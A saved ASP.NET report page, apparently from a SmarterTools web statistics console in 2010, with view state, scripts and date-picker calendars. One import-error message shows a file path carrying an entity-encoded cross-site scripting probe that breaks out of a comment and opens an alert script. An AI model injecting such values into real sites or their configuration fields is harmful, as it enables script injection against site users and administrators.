hAfBgYAQMxh7jbNCB8HBgBAyvij6OAHHwgGAABowSlcoQkfCWgfCmgfCwUMU21hcnRlclRvb2xzHwwFEkRhdGVQaWNrZXJPdmVycmlkZR8NAgJkFgZmDxQrAAgPFhIfCmgfCwUMU21hcnRlclRvb2xzHwgGAABowSlcoQkfDgUWMTAvMTEvMjAxMCAxMjowMDowMCBBTR8FBRMyMDEwLTEwLTExLTAwLTAwLTAwHw8FB3JpTGFiZWwfEGgfCWgfBwYAQMr4o+jgB2QWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlIb3Zlch8NAoICFgYfERsAAAAAAABZQAcAAAAfDAURcmlUZXh0Qm94IHJpRXJyb3IfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFE3JpVGV4dEJveCByaUZvY3VzZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFE3JpVGV4dEJveCByaUVuYWJsZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFFHJpVGV4dEJveCByaURpc2FibGVkHw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlFbXB0eR8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUQcmlUZXh0Qm94IHJpUmVhZB8NAoICZAIBDw8WBB8SBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh8TBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHxQFOnJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfUmFkRW5kRGF0ZScpLCdjYWwnKTtkAgIPFCsADQ8WGgUPUmVuZGVySW52aXNpYmxlZwURRW5hYmxlTXVsdGlTZWxlY3RoBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWluRAYAQMr4o+jgBwUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUSTmF2aWdhdGlvbk5leHRUZXh0ZQUDRVJTaAUSTmF2aWdhdGlvblByZXZUZXh0ZQULU3BlY2lhbERheXMPBZIBVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuQ2FsZW5kYXJEYXlDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABRZGYXN0TmF2aWdhdGlvbk5leHRUZXh0ZQUETWF4RAYAAGjBKVyhCQ8WCB8LBQxTbWFydGVyVG9vbHMfCmgfCWgfEGhkZBYEHwwFC3JjTWFpblRhYmxlHw0CAhYEHwwFDHJjT3RoZXJNb250aB8NAgJkFgQfDAUKcmNTZWxlY3RlZB8NAgJkFgQfDAUKcmNEaXNhYmxlZB8NAgIWBB8MBQxyY091dE9mUmFuZ2UfDQICFgQfDAUJcmNXZWVrZW5kHw0CAhYEHwwFB3JjSG92ZXIfDQICFgQfDAU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHw0CAhYEHwwFCXJjVmlld1NlbB8NAgJkAgkPFgIfAmhkAgsPFgIfAmhkAg0PFgIfAmhkAg8PFgIfAmhkAhEPFgIfAmhkAhMPFgIfAmhkAhUPFgIfAmhkAhcPFgIfAmhkAhkPFgIfAmgWAgIBDxBkZBYAZAIbDxYCHwJoZAIdDxYCHwJoZAIfDxYCHwJoZAIhDw8WAh8FBQpHZXQgUmVwb3J0ZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgYFFmN0bDAwJE1QSCRSYWRTdGFydERhdGUFH2N0bDAwJE1QSCRSYWRTdGFydERhdGUkY2FsZW5kYXIFH2N0bDAwJE1QSCRSYWRTdGFydERhdGUkY2FsZW5kYXIFFGN0bDAwJE1QSCRSYWRFbmREYXRlBR1jdGwwMCRNUEgkUmFkRW5kRGF0ZSRjYWxlbmRhcgUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXKTgIeSE/kwhinT4a3Qhsjk7T/NRv2iB6x/fy0Bw6CLSQ==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=ViSwXssY2t4u-Qbx4w6bru0KSpyf_B0vCVudPBQgSL7pdZgJgsa-ZWozxrSKwrw9y9GZsHwVVOrd1WeIw5NPwP1jyRtmNpMtMhXJtQ7Ds3FNebDhERVTBNBcItEGfJ6GlPm0maqMQuQbXCRuE2OSeQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=b_zxvPWW2bmUI7-yPqxdjxNcYGLbh-5zreoWPsyuSsM904jjxphVYn3M53uzsMEtA28xV93yhZNeO7aopeQCsRrqUrg4Mn087e0aShAFwwmtOSohzmSffW6uJ6_AtQVWulXcR71k6brUxjM0zkq5aQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=rLkVatSveEIPrLuVrqd-Rqu9c-Qp5n3u_agt7bqrbK66Z1GODOCn_TqYoCtv79JakYjGy-hs5HVRebk_BZqNoTXEExvRXPbqgtEiHRkA8jwIrcayoDlnuZWpcWkdnNZ0Xh2nW6TTKEXMqhxGKpfZuDd_ibYZO_jwoRaEz-gTuis1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=_lSjFkDxd3Gnr7ocFU6QUkZOrdHPnZsqNRClSK61AtN-ATLEiBiN0mgZ6qde0SYytY9Y7JPZGbAn0G1XxGzBJPMqZRiXEJK-nZxx5QIbzRoDB5Syl5oGPlUxKWDON3Z5Ld0hMHW-sKkMnHWb_hwzCyUGXoXIUKoCDwj5C88getY1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=JOd_zE-rVnhst9gjbTnWxhkLnomfRJOvAba74jYUNOYndrLTcDyBPLUH4sKs48Lj5n5-lBATFKj-hFHq_rS8K95dEYHJCXJBFm6TbI7MrJu3R7ZD9vx_k8jaeCbKbroCzLu5qdhlqN8jh5PII2qVOLUrmc7F1nKNJN5I5VXGXQI1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=dim8nyrCK3sbBE3vfEjhnHLVQjoQa7K4EDVi51FwrwWZRYjEGIN1TgwIRvo7NIo5VbnkeJxu3LEwuEak1hX108zj9QGEZyRv54Qk_tiJNRVGHTif1EoYWVv49mnpinZUuNk-PXItaRDiww30xt64kKGWlIR8GsCqaB2e72wdFJ01&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=M1ICYTROEq6Ql9y7PDNqrCxwQa2kits8uxrGGwbPfC-BHyJqGbMtKJgZywmD6smfBh2fWMrA8N_QYL5pca4CHQunZwujs5xpqHQQBRkMLnZ1axo0M2uf3lHNZ83m5kv_rhsD90Pm968qBTe6ctQmcba0FFtJnkHipWazocyhYiQ1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
var PageMethods = function() {
PageMethods.initializeBase(this);
this._timeout = 0;
this._userContext = null;
this._succeeded = null;
this._failed = null;
}
PageMethods.prototype = {
_get_path:function() {
var p = this.get_path();
if (p) return p;
else return PageMethods._staticInstance.get_path();},
GetReportProgress:function(guid,succeededCallback, failedCallback, userContext) {
return this._invoke(this._get_path(), 'GetReportProgress',false,{guid:guid},succeededCallback,failedCallback,userContext); }}
PageMethods.registerClass('PageMethods',Sys.Net.WebServiceProxy);
PageMethods._staticInstance = new PageMethods();
PageMethods.set_path = function(value) { PageMethods._staticInstance.set_path(value); }
PageMethods.get_path = function() { return PageMethods._staticInstance.get_path(); }
PageMethods.set_timeout = function(value) { PageMethods._staticInstance.set_timeout(value); }
PageMethods.get_timeout = function() { return PageMethods._staticInstance.get_timeout(); }
PageMethods.set_defaultUserContext = function(value) { PageMethods._staticInstance.set_defaultUserContext(value); }
PageMethods.get_defaultUserContext = function() { return PageMethods._staticInstance.get_defaultUserContext(); }
PageMethods.set_defaultSucceededCallback = function(value) { PageMethods._staticInstance.set_defaultSucceededCallback(value); }
PageMethods.get_defaultSucceededCallback = function() { return PageMethods._staticInstance.get_defaultSucceededCallback(); }
PageMethods.set_defaultFailedCallback = function(value) { PageMethods._staticInstance.set_defaultFailedCallback(value); }
PageMethods.get_defaultFailedCallback = function() { return PageMethods._staticInstance.get_defaultFailedCallback(); }
PageMethods.set_enableJsonp = function(value) { PageMethods._staticInstance.set_enableJsonp(value); }
PageMethods.get_enableJsonp = function() { return PageMethods._staticInstance.get_enableJsonp(); }
PageMethods.set_jsonpCallbackParameter = function(value) { PageMethods._staticInstance.set_jsonpCallbackParameter(value); }
PageMethods.get_jsonpCallbackParameter = function() { return PageMethods._staticInstance.get_jsonpCallbackParameter(); }
PageMethods.set_path("frmViewReports.aspx");
PageMethods.GetReportProgress= function(guid,onSuccess,onFailed,userContext) {PageMethods._staticInstance.GetReportProgress(guid,onSuccess,onFailed,userContext); }
//]]>
</script>


       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$BPH$UpdatePanel2','','tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1','','tctl00$MPH$UP1',''], ['ctl00$MPH$btnGenerateReport','','ctl00$MPH$btnShowReport',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       View Report
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_UpdatePanel2">
   
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       
</div>

           </div>
           <div class="ButtonBarRight">
               

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="ReportLoadingProgress" id="ReportLoadingProgress">
       <div class="ProgressContainer" id="ProgressContainer">
           <div class="ProgressBar" id="ProgressBar">
           </div>
       </div>
       <div class="ProgressText" id="ProgressText">
       </div>
   </div>
   <div id="ctl00_MPH_ReportBar" class="ReportOptionsBar">
       <div class='ReportOptionSection'>
           <div>
               <table class='ReportOptionSection'>
                   <tr>
                       <td class='ReportItemOptionLabel'>
                           Date Range
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadStartDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <!-- 2010.2.817.40 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate" name="ctl00$MPH$RadStartDate" type="text" class="rdfd_" value="2010-10-05" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadStartDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/5/2010" id="ctl00_MPH_RadStartDate_dateInput_text" name="ctl00_MPH_RadStartDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate_dateInput" name="ctl00$MPH$RadStartDate$dateInput" type="text" class="rdfd_" value="2010-10-05-00-00-00" /><input id="ctl00_MPH_RadStartDate_dateInput_ClientState" name="ctl00_MPH_RadStartDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadStartDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadStartDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadStartDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadStartDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadStartDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadStartDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadStartDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadStartDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadStartDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadStartDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_SD" id="ctl00_MPH_RadStartDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_AD" id="ctl00_MPH_RadStartDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadStartDate_ClientState" name="ctl00_MPH_RadStartDate_ClientState" type="hidden" />
</div>
                       </td>
                       <td class='PaddedText'>
                           to
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadEndDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate" name="ctl00$MPH$RadEndDate" type="text" class="rdfd_" value="2010-10-11" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadEndDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/11/2010" id="ctl00_MPH_RadEndDate_dateInput_text" name="ctl00_MPH_RadEndDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate_dateInput" name="ctl00$MPH$RadEndDate$dateInput" type="text" class="rdfd_" value="2010-10-11-00-00-00" /><input id="ctl00_MPH_RadEndDate_dateInput_ClientState" name="ctl00_MPH_RadEndDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadEndDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadEndDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadEndDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadEndDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadEndDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadEndDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadEndDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadEndDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadEndDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadEndDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_SD" id="ctl00_MPH_RadEndDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_AD" id="ctl00_MPH_RadEndDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadEndDate_ClientState" name="ctl00_MPH_RadEndDate_ClientState" type="hidden" />
</div>
                       </td>
                   </tr>
               </table>
           </div>
           <div>
               <table cellspacing='0' class='ReportOptionSection'>
                   <tr>
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       <td class='GenerateReportButton'>
                           <div id="ctl00_MPH_btnGenerateReport" class="BBButton RefreshButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$btnGenerateReport',''); return false;"><span class="BBInner"></span></a></div>
                       </td>
                   </tr>
               </table>
           </div>
       </div>
       <div class='ReportOptionSection' style='display: none'>
           <div id="ctl00_MPH_UpdatePanel1">
   
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               
</div>
       </div>
   </div>
   <input type="hidden" name="ctl00$MPH$hfDMFilename" id="ctl00_MPH_hfDMFilename" />
   <input type="hidden" name="ctl00$MPH$hfDMReport" id="ctl00_MPH_hfDMReport" />
   <div id="ctl00_MPH_UP1">
   
           
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       
</div>
   <input type="submit" name="ctl00$MPH$btnShowReport" value="Display Report" id="ctl00_MPH_btnShowReport" style="display: none" />

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
